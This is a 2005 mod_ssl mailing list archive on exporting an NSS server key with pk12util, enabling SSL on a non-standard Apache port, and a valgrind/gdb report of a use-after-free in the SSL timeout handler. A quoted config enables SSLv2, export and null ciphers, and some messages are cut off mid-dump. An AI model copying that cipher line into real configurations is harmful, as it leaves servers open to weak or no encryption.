Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 <20050809192126.GB13813@ligo.caltech.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: SB 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 8/9/05, Phil Ehrens  wrote:

> Look here (search for pk12util):
>=20
> http://docs.sun.com/source/816-5682-10/esecurty.htm

Thanks! I actually found it on the Sun Forum too. Apparently it's
kinda tricky to use so here's the process...

# export LD_LIBRARY_PATH=3D/bin/https/lib
# cd /alias
# ../bin/https/admin/bin/pk12util -o export.pkcs12 -n Server-Cert -d .
-P "https-hostname-hostname-"
Enter Password or Pin for "NSS Certificate DB":
Enter password for PKCS12 file:=20
Re-enter password:=20
pk12util: PKCS12 EXPORT SUCCESSFUL
# ls -tlra export.pkcs12
-rw-------   1 root     root        3372 Aug  9 12:16 export.pkcs12
#

Then you can extract either the key or the cert...

# openssl pkcs12 -info -in export.pkcs12=20
Enter Import Password:
...
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
...
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 18:58:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E67C714D99E; Tue, 16 Aug 2005 18:58:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scylla.cts.cwu.edu (scylla.cts.cwu.edu [198.104.67.51])
	by master.modssl.org (Postfix) with ESMTP id 88BA314D982
	for ; Tue, 16 Aug 2005 18:58:03 +0200 (CEST)
Received: from CONVERSION-CWU-DAEMON.SCYLLA.CTS.CWU.EDU by SCYLLA.CTS.CWU.EDU
 (PMDF V6.2-1x9 #31005) id <01LRW4CWN8G0000ZP9@SCYLLA.CTS.CWU.EDU> for
 modssl-users@modssl.org; Tue, 16 Aug 2005 09:58:02 -0700 (PDT)
Received: from hermes.cwu.edu (klonas-smtp-vip.cts.cwu.edu [192.168.65.171])
 by SCYLLA.CTS.CWU.EDU (PMDF V6.2-1x9 #31005)
 with ESMTP id <01LRW4CWGYF00010WI@SCYLLA.CTS.CWU.EDU> for
 modssl-users@modssl.org; Tue, 16 Aug 2005 09:58:02 -0700 (PDT)
Received: from CWUGate1-MTA by hermes.cwu.edu	with Novell_GroupWise; Tue,
 16 Aug 2005 09:58:10 -0700
Date: Tue, 16 Aug 2005 09:57:38 -0700
From: Andrew Musselman 
Subject: SSL support for a VirtualHost on a port other than 443
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 6.5.2
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Content-disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Musselman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am trying to set up apache2 to provide SSL support for a VirtualHost
running on port 81.

The server handles https requests just fine, but when I try connecting
with https through port 81 I receive an error (in Firefox "The
connection to [myhost]:81 has terminated unexpectedly.  Some data may
have been transferred.").

Openssl seems to be running fine, as these commands from the FAQ at
http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html return no errors:

$ openssl s_client -connect localhost:443 -state -debug
GET / HTTP/1.0

Can anyone offer some help on getting this to work?  Thanks for your
time.

Best,
Andrew

Andrew Musselman
andrew@cwu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 19:57:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4A28714D9BD; Tue, 16 Aug 2005 19:57:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 16EEB14D982
	for ; Tue, 16 Aug 2005 19:57:07 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id D30F82E60F
	for ; Tue, 16 Aug 2005 20:06:39 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 15191-02 for ;
 Tue, 16 Aug 2005 20:06:35 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 3E30E2FA9EE; Tue, 16 Aug 2005 20:06:35 +0200 (CEST)
Date: Tue, 16 Aug 2005 20:06:35 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSL support for a VirtualHost on a port other than 443
Message-ID: <20050816180635.GE22267@cr>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Aug 16, 2005 at 09:57:38AM -0700, Andrew Musselman wrote:
> I am trying to set up apache2 to provide SSL support for a VirtualHost
> running on port 81.
> 
Have you added a virtualhost for port 81 and the corresponding Listen
statement?

> The server handles https requests just fine, but when I try connecting
> with https through port 81 I receive an error (in Firefox "The
> connection to [myhost]:81 has terminated unexpectedly.  Some data may
> have been transferred.").
> 
Browser messages are not much use.

> Openssl seems to be running fine, as these commands from the FAQ at
> http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html return no errors:
> 
> $ openssl s_client -connect localhost:443 -state -debug
> GET / HTTP/1.0
> 
What if you use localhost:81 instead?

We need more info like the SSL specific part of the conf and perhaps
output of openssl s_client.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 20:16:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CCB2114D9BA; Tue, 16 Aug 2005 20:16:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lewey.cts.cwu.edu (lewey.cts.cwu.edu [198.104.67.45])
	by master.modssl.org (Postfix) with ESMTP id 4D7B514D982
	for ; Tue, 16 Aug 2005 20:16:43 +0200 (CEST)
Received: from CONVERSION-CWU-DAEMON.LEWEY.CTS.CWU.EDU by LEWEY.CTS.CWU.EDU
 (PMDF V6.2-1x9 #31005) id <01LRW73G315S000NEA@LEWEY.CTS.CWU.EDU> for
 modssl-users@modssl.org; Tue, 16 Aug 2005 11:16:42 -0700 (PDT)
Received: from hermes.cwu.edu (klonas-smtp-vip.cts.cwu.edu [192.168.65.171])
 by LEWEY.CTS.CWU.EDU (PMDF V6.2-1x9 #31005)
 with ESMTP id <01LRW73FOHHY000NGD@LEWEY.CTS.CWU.EDU> for
 modssl-users@modssl.org; Tue, 16 Aug 2005 11:16:41 -0700 (PDT)
Received: from CWUGate1-MTA by hermes.cwu.edu	with Novell_GroupWise; Tue,
 16 Aug 2005 11:16:49 -0700
Date: Tue, 16 Aug 2005 11:16:36 -0700
From: Andrew Musselman 
Subject: Re: SSL support for a VirtualHost on a port other than 443
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 6.5.2
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Content-disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Musselman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Andrew Musselman
andrew@cwu.edu

>>> mads@toftum.dk 8/16/2005 11:06 AM >>>
On Tue, Aug 16, 2005 at 09:57:38AM -0700, Andrew Musselman wrote:
> I am trying to set up apache2 to provide SSL support for a
VirtualHost
> running on port 81.
> 
"Have you added a virtualhost for port 81 and the corresponding Listen
statement?"

Yes.  Here is the section of httpd.conf that introduces the
virtualhost:

Listen 81

     ServerAdmin andrew@cwu.edu 
     DocumentRoot /usr/local/www/printers
     ServerName pc74965.cts.cwu.edu
     DirectoryIndex index.html index.php
     ErrorLog /var/log/printers-error_log
     CustomLog /var/log/printers-error_log combined


Do I need to add any ssl-specific directives in there?

> Openssl seems to be running fine, as these commands from the FAQ at
> http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html return no errors:
> 
> $ openssl s_client -connect localhost:443 -state -debug
> GET / HTTP/1.0
> 
"What if you use localhost:81 instead?"

openssl s_client -connect localhost:81 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08097700 [080AF000] (142 bytes => 142 (0x8E))
0000 - 80 8c 01 03 01 00 63 00-00 00 20 00 00 39 00 00   ......c...
..9..
0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0  
8..5............
0020 - 00 00 33 00 00 32 00 00-2f 03 00 80 00 00 66 00  
..3..2../.....f.
0030 - 00 05 00 00 04 01 00 80-08 00 80 00 00 63 00 00  
.............c..
0040 - 62 00 00 61 00 00 15 00-00 12 00 00 09 06 00 40  
b..a...........@
0050 - 00 00 65 00 00 64 00 00-60 00 00 14 00 00 11 00  
..e..d..`.......
0060 - 00 08 00 00 06 04 00 80-00 00 03 02 00 80 65 43  
..............eC
0070 - 72 73 95 0d 7b b2 15 ca-94 15 4a 87 2f 27 30 03  
rs..{.....J./'0.
0080 - 9b 3a 3c 1c 9a be 06 01-b3 68 ef 27 53 8b        
.:<......h.'S.
SSL_connect:SSLv2/v3 write client hello A
read from 08097700 [080B5000] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                              
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are
unsure
# consult the online docs. You have been warned.
#

#
# Pseudo Random Number Generator (PRNG):
# Configure one or more sources to seed the PRNG of the SSL library.
# The seed data should be of good random quality.
# WARNING! On some platforms /dev/random blocks if not enough entropy
# is available. This means you then cannot use the /dev/random device
# because it would lead to very long connection times (as long as
# it requires to make more entropy available). But usually those
# platforms additionally provide a /dev/urandom device which doesn't
# block. So, if available, use this one instead. Read the mod_ssl User
# Manual for more details.
#
# Note: This must come before the  container to support
#       starting without SSL on platforms with no /dev/random
equivalent
#       but a statically compiled-in mod_ssl.
#
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



#
# When we also provide SSL we have to listen to the
# standard HTTP port (see above) and to the HTTPS port
#
# Note: Configurations that use IPv6 but not IPv4-mapped addresses need
two
#       Listen directives: "Listen [::]:443" and "Listen 0.0.0.0:443"
#
Listen 443

##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

#   Pass Phrase Dialog:
SSLPassPhraseDialog  builtin

#   Inter-Process Session Cache:
SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization.
SSLMutex  file:/var/run/ssl_mutex

##
## SSL Virtual Host Context
##



#   General setup for the virtual host
DocumentRoot "/usr/local/www/data"
ServerName pc74965.cts.cwu.edu:443
ServerAdmin andrew@cwu.edu 
ErrorLog /var/log/httpd-error.log
TransferLog /var/log/httpd-access.log

#   SSL Engine Switch:
SSLEngine on

#   SSL Cipher Suite:
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

#   Server Certificate:
SSLCertificateFile /usr/local/etc/apache2/ssl.crt/server.crt

#   Server Private Key:
SSLCertificateKeyFile /usr/local/etc/apache2/ssl.key/server.key

#   Set various options for the SSL engine.

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
CustomLog /var/log/httpd-ssl_request.log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 22:01:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8902714D99E; Tue, 16 Aug 2005 22:01:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nmail.fiu.edu (nmail.fiu.edu [131.94.74.219])
	by master.modssl.org (Postfix) with ESMTP id 413E814D982
	for ; Tue, 16 Aug 2005 22:01:29 +0200 (CEST)
Subject: chuck lyon/FIU is out of the office.
From: chuck@fiu.edu
To: modssl-users@modssl.org
Message-ID: 
Date: Tue, 16 Aug 2005 16:01:39 -0400
X-MIMETrack: Serialize by Router on smtp1/FIU(Release 6.5.1|January 21, 2004) at 08/16/2005
 16:02:34
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: chuck@fiu.edu
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  08/11/2005 and will not return until
08/29/2005.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 22:09:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E46F414D99E; Tue, 16 Aug 2005 22:09:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from guard1.med.utah.edu (smtp.med.utah.edu [155.100.239.209])
	by master.modssl.org (Postfix) with ESMTP id 4B20714D982
	for ; Tue, 16 Aug 2005 22:09:11 +0200 (CEST)
Received: from zix1.med.utah.edu (unverified [155.100.238.42]) by guard1.med.utah.edu
 (Vircom SMTPRS 4.0.346.0) with ESMTP id  for ;
 Tue, 16 Aug 2005 14:09:09 -0600
Received: from zix1.med.utah.edu (ZixVPM [127.0.0.1])
	by Outbound.med.utah.edu (Proprietary) with ESMTP id 641A04BE45
	for ; Tue, 16 Aug 2005 13:44:45 -0600 (MDT)
Received: from gwdom2-med.med.utah.edu (gwdom2-med.med.utah.edu [155.100.238.74])
	by zix1.med.utah.edu (Proprietary) with ESMTP id 1C8454BE44
	for ; Tue, 16 Aug 2005 13:44:44 -0600 (MDT)
Received: from GWY-MTA by gwdom2-med.med.utah.edu
	with Novell_GroupWise; Tue, 16 Aug 2005 14:09:08 -0600
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.5.4 
Date: Tue, 16 Aug 2005 14:08:52 -0600
From: "Evan Dillon" 
To: 
Subject: Re: chuck lyon/FIU is out of the office.
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=__PartAA88E6C4.0__="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Evan Dillon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a MIME message. If you are reading this text, you may want to 
consider changing to a mail reader or gateway that understands how to 
properly handle MIME multipart messages.

--=__PartAA88E6C4.0__=
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Chuck,
 
Thanks for keeping us in the loop.

>>> chuck@fiu.edu 08/16/2005 02:01:39 >>>





I will be out of the office starting  08/11/2005 and will not return
until
08/29/2005.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


--=__PartAA88E6C4.0__=
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Description: HTML






Chuck,


 


Thanks for keeping us in the loop.

>>> chuck@fiu.edu =
08/16/2005 02:01:39 >>>






I will be out of the office =
starting  08/11/2005 and will not return until
08/29/2005.

I=
 will respond to your message when I return.

_______________________=
_______________________________________________
Apache Interface to =
OpenSSL (mod_ssl)         &nbs=
p;         www.modssl.org
User Support Mailing List   =
            &nb=
sp;      modssl-users@modssl.org
Automated =
List Manager          &nb=
sp;            =
     majordomo@modssl.org


--=__PartAA88E6C4.0__=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 16 22:31:44 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D608C14D9BD; Tue, 16 Aug 2005 22:31:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 22D4D14D982
	for ; Tue, 16 Aug 2005 22:31:43 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 2F0FD2FA782
	for ; Tue, 16 Aug 2005 22:41:22 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 16022-02 for ;
 Tue, 16 Aug 2005 22:41:15 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id A258A2FB24E; Tue, 16 Aug 2005 22:41:15 +0200 (CEST)
Date: Tue, 16 Aug 2005 22:41:15 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSL support for a VirtualHost on a port other than 443
Message-ID: <20050816204115.GF22267@cr>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Aug 16, 2005 at 11:16:36AM -0700, Andrew Musselman wrote:
> Listen 81
> 
>      ServerAdmin andrew@cwu.edu 
>      DocumentRoot /usr/local/www/printers
>      ServerName pc74965.cts.cwu.edu
>      DirectoryIndex index.html index.php
>      ErrorLog /var/log/printers-error_log
>      CustomLog /var/log/printers-error_log combined
> 
> 
> Do I need to add any ssl-specific directives in there?
> 
Yes. SSLEngine on is the first thing to add - you also need to point to
the server cert and key.

> SSL_connect:SSLv2/v3 write client hello A
> read from 08097700 [080B5000] (7 bytes => 7 (0x7))
> 0000 - 3c 21 44 4f 43 54 59                              
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 836FC14D9AA; Wed, 17 Aug 2005 01:48:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from charybdis.cts.cwu.edu (charybdis.cts.cwu.edu [198.104.67.52])
	by master.modssl.org (Postfix) with ESMTP id 4F98714D980
	for ; Wed, 17 Aug 2005 01:48:18 +0200 (CEST)
Received: from CONVERSION-CWU-DAEMON.CHARYBDIS.CTS.CWU.EDU by
 CHARYBDIS.CTS.CWU.EDU (PMDF V6.2-1x9 #31005)
 id <01LRWIOJEINK001B57@CHARYBDIS.CTS.CWU.EDU> for modssl-users@modssl.org;
 Tue, 16 Aug 2005 16:48:16 -0700 (PDT)
Received: from hermes.cwu.edu (klonas-smtp-vip.cts.cwu.edu [192.168.65.171])
 by CHARYBDIS.CTS.CWU.EDU (PMDF V6.2-1x9 #31005)
 with ESMTP id <01LRWIOIZ04M001D2G@CHARYBDIS.CTS.CWU.EDU> for
 modssl-users@modssl.org; Tue, 16 Aug 2005 16:48:16 -0700 (PDT)
Received: from CWUGate1-MTA by hermes.cwu.edu	with Novell_GroupWise; Tue,
 16 Aug 2005 16:48:24 -0700
Date: Tue, 16 Aug 2005 16:48:06 -0700
From: Andrew Musselman 
Subject: Re: SSL support for a VirtualHost on a port other than 443
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 6.5.2
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Content-disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Musselman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mads,

Thank you so much for your help.  It worked almost perfectly once I
added those lines, plus a couple more:

Listen 81

     ServerAdmin andrew@cwu.edu
     DocumentRoot /usr/local/www/printers
     ServerName pc74965.cts.cwu.edu
     DirectoryIndex index.html index.php
     ErrorLog /var/log/printers-error_log
     CustomLog /var/log/printers-error_log combined
     
     LoadModule ssl_module libexec/apache2/mod_ssl.so
     SSLEngine on
     SSLCertificateFile /usr/local/etc/apache2/ssl.crt/server.crt  
     SSLCertificateKeyFile /usr/local/etc/apache2/ssl.key/server.key
     


There may be a couple extra things in there, since apachectl complains
about loading the ssl_module twice..

I really appreciate the help.

Best,
Andrew

Andrew Musselman
andrew@cwu.edu
>>> mads@toftum.dk 08/16/05 1:41 PM >>>
On Tue, Aug 16, 2005 at 11:16:36AM -0700, Andrew Musselman wrote:
> Listen 81
> 
>      ServerAdmin andrew@cwu.edu 
>      DocumentRoot /usr/local/www/printers
>      ServerName pc74965.cts.cwu.edu
>      DirectoryIndex index.html index.php
>      ErrorLog /var/log/printers-error_log
>      CustomLog /var/log/printers-error_log combined
> 
> 
> Do I need to add any ssl-specific directives in there?
> 
Yes. SSLEngine on is the first thing to add - you also need to point to
the server cert and key.

> SSL_connect:SSLv2/v3 write client hello A
> read from 08097700 [080B5000] (7 bytes => 7 (0x7))
> 0000 - 3c 21 44 4f 43 54 59                              
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 378FD14D9BA; Wed, 17 Aug 2005 05:58:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hemi.blown.net (hemi.blown.net [217.160.249.191])
	by master.modssl.org (Postfix) with ESMTP id C6FEA14D980
	for ; Wed, 17 Aug 2005 05:58:24 +0200 (CEST)
Received: from boost.blown.net (68-114-17-158.dhcp.gwnt.ga.charter.com [68.114.17.158])
	by hemi.blown.net (8.12.10/8.12.10) with ESMTP id j7H3wNPx029705
	for ; Tue, 16 Aug 2005 23:58:23 -0400
Received: from torque (torque.blown.net [192.168.1.37])
	by boost.blown.net (8.12.11/8.12.11) with ESMTP id j7H3wMF7015170
	for ; Tue, 16 Aug 2005 23:58:22 -0400
Message-Id: <200508170358.j7H3wMF7015170@boost.blown.net>
From: 
To: 
Subject: timeout handler / segfaults
Date: Tue, 16 Aug 2005 23:58:22 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Thread-Index: AcWi3+l5ZmgAOXefQI+2rUKb6taILg==
X-Spam-Score: -4.196 () ALL_TRUSTED,BAYES_00,NO_REAL_NAME
X-Scanned-By: MIMEDefang 2.43
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I found a couple of messages about this in the archives, but I don't see any
responses.  It looks like the sigalarm timeout handler is getting called
while SSL is blocked in write(), the SSL context is free()'d in the timeout
handler, and finally when the handler returns to where we were blocked,
openssl is referencing the SSL context that was already free()'d.  Maybe I'm
missing something, but it seems like this should be causing a segfault
anytime an Apache timeout occurs while writing to an SSL socket.


==30422== Invalid read of size 4
==30422==    at 0x1BA3C781: sock_write (bss_sock.c:226)
==30422==    by 0x1BA3A90D: BIO_write (bio_lib.c:200)
==30422==    by 0x1B9CB94A: ssl3_write_pending (s3_pkt.c:696)
==30422==    by 0x1B9CB5BD: ssl3_write_bytes (s3_pkt.c:541)
==30422==    by 0x1B9C9743: ssl3_write (s3_lib.c:1299)
==30422==    by 0x1B9D1AAB: SSL_write (ssl_lib.c:756)
==30422==    by 0x8081031: ssl_io_hook_write (ssl_engine_io.c:384)
==30422==    by 0x80B983E: ap_hook_call_func (ap_hook.c:721)
==30422==    by 0x80B945F: ap_hook_call (ap_hook.c:382)
==30422==    by 0x8094B73: ap_write (buff.c:318)
==30422==    by 0x8095913: write_with_errors (buff.c:365)
==30422==    by 0x80959C6: bcwrite (buff.c:1170)
==30422==  Address 0x1BB6CBAC is 20 bytes inside a block of size 64 free'd
==30422==    at 0x1B9019D9: free (vg_replace_malloc.c:152)
==30422==    by 0x1BA0AF7C: CRYPTO_free (mem.c:254)
==30422==    by 0x1BA3A6B6: BIO_free (bio_lib.c:136)
==30422==    by 0x1BA3B09F: BIO_free_all (bio_lib.c:456)
==30422==    by 0x1B9D0F74: SSL_free (ssl_lib.c:354)
==30422==    by 0x807DF8D: ssl_hook_CloseConnection
(ssl_engine_kernel.c:533)
==30422==    by 0x809FC34: ap_call_close_connection_hook (http_main.c:460)
==30422==    by 0x80A071F: timeout (http_main.c:1584)
==30422==    by 0x80A0912: alrm_handler (http_main.c:1646)
==30422==    by 0x1B91574D: __pthread_sighandler (in
/lib/i686/libpthread-0.10.so)
==30422==    by 0x42028557: (within /lib/i686/libc-2.3.2.so)
==30422==    by 0x1BA3A90D: BIO_write (bio_lib.c:200)



(gdb) break http_main.c:1584
Breakpoint 1 at 0x80a0712: file http_main.c, line 1584.
(gdb) cont
Continuing.
[Switching to Thread 16384 (LWP 32750)]

Breakpoint 1, timeout (sig=14) at http_main.c:1584
1584    http_main.c: No such file or directory.
        in http_main.c
(gdb) bt
#0  timeout (sig=14) at http_main.c:1584
#1  0x080a0913 in alrm_handler (sig=0) at http_main.c:1646
#2  0x4002374e in __pthread_sighandler () from /lib/i686/libpthread.so.0
#3  
#4  0x400238a8 in write () from /lib/i686/libpthread.so.0
#5  0x401b7548 in __JCR_LIST__ () from /lib/libcrypto.so.2
#6  0x4014290e in BIO_write (b=0xbfffc138, in=0x81eef50, inl=8221)
    at bio_lib.c:200
#7  0x400d694b in ssl3_write_pending (s=0xbfffc0bc, type=0, buf=0x0,
len=8192)
    at s3_pkt.c:696
#8  0x400d65be in ssl3_write_bytes (s=0x8173970, type=23, buf_=0xbfffc670, 
    len=0) at s3_pkt.c:541
#9  0x400d4744 in ssl3_write (s=0x2000, buf=0x0, len=8192) at s3_lib.c:1299
#10 0x400dcaac in SSL_write (s=0x1, buf=0x1, num=1) at ssl_lib.c:756
#11 0x08081032 in ssl_io_hook_write (fb=0x2000, 
    buf=0xbfffc670 "m"..., len=8192)
    at ssl_engine_io.c:384
#12 0x080b983f in ap_hook_call_func (ap=0x0, he=0x80ed888, hf=0x42138c90)
    at ap_hook.c:721
#13 0x080b9460 in ap_hook_call (hook=0x0) at ap_hook.c:382
#14 0x08094b74 in ap_write (fb=0x80ed888, buf=0x0, nbyte=8192) at buff.c:318
#15 0x08095914 in write_with_errors (fb=0x80ed888, buf=0xbfffc670, nbyte=0)
    at buff.c:365
#16 0x080959c7 in bcwrite (fb=0x8107e68, buf=0xbfffc670, nbyte=8192)
    at buff.c:1170
#17 0x08095d2b in ap_bwrite (fb=0x8107e68, buf=0xbfffc670, nbyte=8192)
    at buff.c:1384
#18 0x080a8e11 in ap_send_fd_length (f=0x81f57a0, r=0x81c6b78,
length=85684453)
    at http_protocol.c:2386
#19 0x0809e7fa in default_handler (r=0x2000) at http_core.c:4196
#20 0x08096ba9 in ap_invoke_handler (r=0x81c6b78) at http_config.c:487
#21 0x080abbd4 in process_request_internal (r=0x81c6b78) at
http_request.c:1298
#22 0x080abe2b in ap_process_request (r=0x81c6b78) at http_request.c:1314
#23 0x080a395e in child_main (child_num_arg=0) at http_main.c:4872
